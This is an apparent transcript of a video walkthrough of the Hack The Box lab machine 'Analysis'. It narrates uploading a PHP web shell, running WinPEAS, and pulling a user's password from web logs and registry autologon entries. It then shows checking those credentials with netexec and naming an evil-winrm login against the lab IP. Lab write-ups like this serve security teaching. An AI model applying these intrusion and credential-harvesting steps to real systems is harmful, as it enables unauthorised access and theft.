it's writable by everyone. I don't know exactly why, but that's just what it is. So we're going to wget it. And then once it's downloaded, we will run it. And this will take some time to run. So let's get another shell and look at the other way to get the user's password. So let's go back here, send this. That should have got a shell, right? Upload shell.php. Why is this not working anymore? Oh, I have a 2 there? There we go. I did not RL wrap. I hope that WinPs is running. I'm used to seeing some output. Maybe it'll come when it's finished. Okay. So if we started poking around at all the PHP scripts, let's go do a dir. We have a bunch of YAR rules, which is a bit odd. And the intended way to exploit this was actually to upload a HTA file that it executes. But since you could just do PHP, I didn't really bother doing that. Let's see. We got emergency.php. What is this? And then we have our alert panel. These two are new to me. So I want to see exactly what emergency.php is. And maybe we can just go to it. Analysis. Let's do internal analysis HTB. Employees. Log in. I have to re-log into the application. Technician at analysis.htb. And we will put in the password. So let's go cat creds, technician, copy, paste. Oh, emergency's right here. I don't know if I ever looked at this. We have emergency notification. Let's see. Not exactly sure what this is doing. Let's look at the alert. So we got alert panel.php. And we can also see if we can access this to see what it looks like. We have no security alerts. So if we look at this script, search string, see. Session. So at the very top of this, it's checking if the get variable password is set. It's also checking the get variable username and the get variable alert. So since these are in gets, it's going to be in the URL. So let's go to the access logs and look at anything from alert panel. So if I go logs, dir, log files, are these files or directories? I don't know which one to go to. We'll try this one first. Find string, alert underscore panel, star.log. Let's go to the other one. Maybe find string, I did that wrong. Nope, there we go. So if we look at this, we can see dashboard, alert panel, auth1, username, JDOE, and then we have this password. So this is another way we could have got the password just by looking at the source code and discovering there is an endpoint that has password as a get variable. So we go look at HTTP logs. If WinPeas finishes, which it does, this user is also configured to automatically log into the box. So there is going to be an entry, a registry entry that has auto login. I'm just going to search for JDOE. There we go. So if we look for auto login credentials, we see JDOE and then this password. So two ways we can get this user's credential. So let's go vcreds, and then we can say JDOE and put this password in. And then if we do the netexec nxc, SMB 10.10.11.250, JDOE, the password. This is just going to verify we have a successful auth because we're not an admin, so we can't just get a shell from here. If I look at winrm, it is going to say we can access it. So we could use like evil winrm -i 10.10.11.250-u JDOE-p and log into the box. Now, if we look at JDOE, we can see there is a bcdb directory in the documents. Also, if we run task list, we can't run from evil winrm because we're non-interactive. We should be able to run get process, or we could run task list from a reverse shell because we're local on the box here, right? So either of those work. We do see there is a BC text encoder, and it's got an interactive session on it. So what we have to do is find this binary, and then we could download it and look at it. If we also went to cd/, do a dir, there is a private directory as well. And if we look at encoded.txt, this is going to be a encoded message from the BC text encoder utility. So we have to find a way to decrypt this. And since the JDOE user has this application running, we could hook it and examine all the memory in it. You could also potentially run a keylogger and then get keys as they're typed in. However, the way the box author set this up, a keylogger will not work because they're doing a DLL injection and then manually doing the call in the application to force you to hook it. So I'm going to do a separate video on just hooking because if we kept going on, it would probably double the length of this video because there's a lot of things I want to talk about when we show that, right? So if we just go progra1, this is going to get in the program files. We can go to BC text encoder. And then we could also download it. This is also just downloadable on the internet. So you could download it that way if you don't want to exfil it off the box. But that is going to conclude the video. I know it's a bit odd that we didn't show the intended route, but we showed a pretty cool unintended route with that Snort DLL thing. And hopefully in a week or two, I will have the next part of the video up where we do hooking in order to examine all the text that is being written into BC text encoder. So with that being said, hope you guys enjoyed the video. Take care, and I'll see you all next time.